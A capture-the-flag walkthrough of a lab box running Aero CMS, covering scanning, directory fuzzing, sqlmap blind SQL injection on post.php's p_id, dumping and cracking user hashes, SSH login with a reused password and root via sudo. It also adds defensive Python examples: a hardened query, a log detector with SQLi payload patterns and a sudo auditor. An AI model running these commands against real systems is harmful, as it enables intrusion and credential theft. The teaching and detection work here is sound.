Category: SQL Injection
Obtain user & root flags
Complete all questions
Can you find the vulnerabilities in this CMS? If so, be sure to report them to their GitHub.
Before engaging anything, connect or download your free VPN pack from the VPN tab.
After downloading your VPN pack, start the VPN using the following command:
sudo openvpn path/to/vpn
Most of the time it will be in your Downloads folder, so the syntax looks like this:
sudo openvpn ~/Downloads/name.ovpn
After that, you can ping the host to ensure it's running.
Let's dive in with a quick nmap scan. Since we know we are dealing with a CMS that is vulnerable to SQL injection (according to the machine category and description), the scan should tell us which port the CMS is running on and give us an insight into which other ports are open.
nmap 10.14.0.71
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-02 15:24
Nmap scan report for aero (10.14.0.71)
Host is up (0.23s latency).
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
Nmap done: 1 IP address (1 host up) scanned in 13.08 seconds
Without wasting any time, we need the CMS version running on port 80 and the GitHub repository of the CMS.
We can browse on port 80 using Firefox or your favorite browser and see if there is a CMS version/GitHub link mentioned anywhere.
Common places to look: the footer of the page, source code comments, and maybe response headers. We can also use the Wappalyzer extension to check the technology stack.
After trying all of the above methods, I didn't succeed in getting the version, but I got the developer name in the default page footer. Guess we will have to settle for a simple Google search after all.
So we have the repo; this should lead us to the version and maybe other juicy stuff. After checking the latest commits, we get that the latest version is v0.0.1. There is still another, easier way of getting the version that I can't remember correctly.
Now that we have the CMS version, should we fire up Nessus and Metasploit and pwn the mainframe? NO.
How can we use this version number and GitHub repo?
Search for known vulnerabilities associated with the version (which we already know is SQLi)
Check if we can find default credentials in the GitHub repo
At this point, we know that Aero CMS v0.0.1 is vulnerable to SQL injection, but where does it occur? Back to the drawing board: we need to enumerate the webpage to see where the vulnerability occurs.
To achieve this we can start by fuzzing for any endpoints or paths using Gobuster, Feroxbuster, or FFUF. Let's use Feroxbuster and FFUF recursively and simultaneously, because why not.
Here is the syntax for both (the target is the same host we scanned above):
feroxbuster -u http://10.14.0.71 -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x py,html,config,conf,txt,php,dev,backup,bak
ffuf -u "http://10.14.0.71/FUZZ" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -mc all -fc 404 -ic -e .bak,.db,.config,.txt,.backup,.php,.html,.htm,.tar,.zip,.js -c
This is what we will get after running either of the above commands:
Sweet, looking at that output we can see that there is an admin panel, a search panel, and other good stuff like
Remember that we can get the default username and password from the GitHub repo or from our target's homepage, which is
Username: admin and
With those credentials, we can edit posts on the blog, add users, and give them permissions, but that's not our goal; we need to know where the SQLi occurs.
Okay so, this is what we have so far on the blog paths:
/search.php
/login.php
/post.php
/admin.php
/category.php
-------snip--------
Well, this is where we channel our inner 1337_h4x0r moment. We can fire up the old reliable sqlmap or decide to do the injection manually on the following endpoints:
If you browse all the paths properly, it is like a buffet of user input.
As a hater and an elite hacker man, we are going to target http://10.14.0.71/post.php?p_id=1. There are other parts we can test for SQL injection, like the search bar using Burp Suite, but let's stick with
Let's craft the sqlmap syntax to trigger the vulnerability:
sqlmap -u "http://10.14.0.71/post.php?p_id=1" --dbms mysql --level 3 --risk 3
We are using the --dbms flag because we already know the database runs on MySQL, thanks to the info we got from the Wappalyzer extension.
After running the above command we get the following output from sqlmap:
---
Parameter: p_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: p_id=1 AND 5165=5165

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: p_id=1 AND (SELECT 9525 FROM (SELECT(SLEEP(5)))Yhmj)
---
We are golden! The p_id parameter it is. Now it's time to get the credz.
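To see why a boolean-based blind payload like p_id=1 AND 5165=5165 works, here is an added Python example (not code from the room or from Aero CMS) that models the vulnerable pattern behind it and the fix. It uses an in-memory SQLite table standing in for the CMS's posts table (the real schema is not on this page, so the table and rows are constructed), concatenates the p_id value into the query the way a vulnerable post.php would, and then shows the hardened version with an integer check plus a bound parameter. The SLEEP-based time payload is not reproduced because SQLite has no SLEEP().

```python
import sqlite3


def make_db():
    """Constructed stand-in for the CMS's posts table (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (p_id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO posts VALUES (?, ?)",
                     [(1, "Hello space"), (2, "Second post")])
    return conn


def get_post_vulnerable(conn, p_id):
    # Vulnerable pattern: the raw query-string value is pasted into the SQL text,
    # so "1 AND 5165=5165" becomes part of the WHERE clause and changes the logic.
    sql = "SELECT title FROM posts WHERE p_id = " + p_id
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def get_post_hardened(conn, p_id):
    # Hardened (hypothetical) version: reject anything that is not a plain integer,
    # then bind the value as a parameter so it can never alter the query's structure.
    if not p_id.isdigit():
        return None
    row = conn.execute("SELECT title FROM posts WHERE p_id = ?", (int(p_id),)).fetchone()
    return row[0] if row else None


def leaks_boolean_oracle(fetch, conn):
    """True when a true and a false condition appended to a valid id give different
    responses. That difference is exactly what the boolean-based blind technique
    measures; the payload sqlmap reported above was p_id=1 AND 5165=5165."""
    with_true = fetch(conn, "1 AND 5165=5165")
    with_false = fetch(conn, "1 AND 5165=5166")
    return with_true != with_false


if __name__ == "__main__":
    db = make_db()
    print("vulnerable endpoint leaks oracle:", leaks_boolean_oracle(get_post_vulnerable, db))  # True
    print("hardened endpoint leaks oracle:", leaks_boolean_oracle(get_post_hardened, db))     # False
```

Against the vulnerable function the two probes return the post and nothing respectively, which is the yes/no channel sqlmap extracts data through one bit at a time; against the hardened function both probes are rejected before any SQL runs, so there is nothing to measure.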
Time to dump some more info and see what we will work with. Take this syntax and slap it right on the terminal:
sqlmap -u "http://10.14.0.71/post.php?p_id=1" --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
It would be quicker to dump the info one by one, from the database name down to all the columns.
database management system users:
[*] 'debian-sys-maint'@'localhost'
[*] 'mysql.infoschema'@'localhost'
[*] 'mysql.session'@'localhost'
[*] 'mysql.sys'@'localhost'
[*] 'neil'@'localhost'
[*] 'phpmyadmin'@'localhost'
[*] 'root'@'localhost'
Oooow, look at that Neil guy. He looks famous. I wonder what he did back then. We won't mind getting his password hash.
sqlmap -u "http://10.14.0.71/post.php?p_id=1" -p p_id -D aerocms -T users -C user_id,username,password --dump --threads=6
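Everything sqlmap has done so far leaves a very recognisable trail in the web server's access log, so here is an added Python example (not part of the room, and not code from the CMS) of what the blue team side looks like: a small detector that parses Apache combined-format lines, URL-decodes the query string and flags the two blind techniques reported above (AND n=n and SLEEP(), plus UNION probes) as well as sqlmap's default User-Agent. The log lines are constructed for the example; the second and third carry the exact payloads from the sqlmap output above.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Constructed Apache combined-format lines (not a capture from the room).
SAMPLE_LOG = """\
10.8.0.5 - - [02/May/2023:15:30:01 +0000] "GET /post.php?p_id=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.8.0.5 - - [02/May/2023:15:30:02 +0000] "GET /post.php?p_id=1%20AND%205165%3D5165 HTTP/1.1" 200 5123 "-" "sqlmap/1.7.4#stable (https://sqlmap.org)"
10.8.0.5 - - [02/May/2023:15:30:03 +0000] "GET /post.php?p_id=1%20AND%20%28SELECT%209525%20FROM%20%28SELECT%28SLEEP%285%29%29%29Yhmj%29 HTTP/1.1" 200 5123 "-" "sqlmap/1.7.4#stable (https://sqlmap.org)"
10.8.0.9 - - [02/May/2023:15:31:10 +0000] "GET /search.php?search=space HTTP/1.1" 200 2200 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Signatures for the two blind techniques sqlmap reported against p_id, plus UNION probes.
SIGNATURES = {
    "boolean_blind": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I),
    "time_blind":    re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(", re.I),
    "union_select":  re.compile(r"\bunion\b.*\bselect\b", re.I),
}


def classify_request(target, ua):
    """Return the reasons a request looks like an SQLi probe (empty list if clean)."""
    reasons = []
    decoded = unquote_plus(urlsplit(target).query)  # decode %20, %3D, %28 ... first
    for name, rx in SIGNATURES.items():
        if rx.search(decoded):
            reasons.append(name)
    if ua.lower().startswith("sqlmap"):  # sqlmap's default User-Agent unless --random-agent is used
        reasons.append("scanner_ua")
    return reasons


def analyze(log_text):
    """Parse each log line and keep only the ones that trip a signature."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify_request(m["target"], m["ua"])
        if reasons:
            hits.append({"ip": m["ip"], "ts": m["ts"], "target": m["target"], "reasons": reasons})
    return hits


def probes_by_source(hits):
    """Count flagged requests per source address, to spot a single scanner quickly."""
    return dict(Counter(h["ip"] for h in hits))


if __name__ == "__main__":
    found = analyze(SAMPLE_LOG)
    for h in found:
        print(h["ip"], h["ts"], ", ".join(h["reasons"]))
    print(probes_by_source(found))
```

Decoding before matching matters: the payloads arrive percent-encoded, so a pattern run over the raw line would miss "AND 5165=5165". A numeric-only parameter like p_id is also a cheap place for a WAF or the application itself to reject anything that is not digits, which would have stopped both payloads regardless of signature coverage.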
From here we can use John the Ripper or Hashcat to crack the above hashes using the rockyou.txt wordlist:
john neil.hash --wordlist=/home/xi/rockyou.txt
john neil.hash --show
hashcat -m 3200 neil.hash rockyou.txt where
After retrieving the password for the user neil, we can use it to log in to the blog, but let's see if the password also works on SSH running on port 22.
In our case we get SSH access using the cracked password; now we can get and submit the
neil@space:~$ cat user.txt
76*************************************fff
neil@space:~$
First, we run the command sudo -l to check what our user neil can run on the machine:
neil@space:~$ sudo -l
Matching Defaults entries for neil on space:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User neil may run the following commands on space:
    (ALL : ALL) ALL
neil@space:~$
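The (ALL : ALL) ALL line is the finding an administrator auditing this box would want flagged automatically, so here is an added Python example (not from the room) that parses sudo -l output and reports rules granting unrestricted root or passwordless commands. The sample output is constructed: it mirrors the shape of the listing above and adds a hypothetical NOPASSWD line to show the second check.

```python
import re

# Constructed `sudo -l` output in the same shape as the listing above; the NOPASSWD
# rule is hypothetical and only there to exercise the second check.
SUDO_L_OUTPUT = """\
Matching Defaults entries for neil on space:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin, use_pty

User neil may run the following commands on space:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/systemctl restart apache2
"""

# One rule line: "(runas_user : runas_group) TAG: cmd1, cmd2"
RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$')


def parse_sudo_rules(text):
    """Return the rule lines that follow the 'User ... may run' header as dicts."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        if not in_rules:
            continue  # skip the Defaults block
        m = RULE_RE.match(line)
        if not m:
            continue
        runas_user = m["runas"].split(":")[0].strip()
        tags = [t.strip() for t in m["tags"].split(":") if t.strip()]
        cmds = [c.strip() for c in m["cmds"].split(",")]
        rules.append({"runas": runas_user, "tags": tags, "cmds": cmds})
    return rules


def assess(rules):
    """Flag rules that amount to full root (any command as root/ALL) or skip the password."""
    findings = []
    for r in rules:
        if "ALL" in r["cmds"] and r["runas"] in ("ALL", "root"):
            findings.append("full_root")  # `sudo su` and any other command as root
        if "NOPASSWD" in r["tags"]:
            findings.append("nopasswd")
    return findings


if __name__ == "__main__":
    parsed = parse_sudo_rules(SUDO_L_OUTPUT)
    for rule in parsed:
        print(rule)
    print(assess(parsed))  # ['full_root', 'nopasswd']
```

Run against the listing above, the first rule is reported as full root: a user who can run ALL as ALL is root with one extra command, which is exactly why a cracked, reused password for that account ends the box. Scoping the rule to the specific commands the account actually needs is the fix.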
This should be easy as
neil@space:~$ sudo su
root@space:/home/neil# cd ~
root@space:~# cat root.txt
2024****************************5602
root@space:~#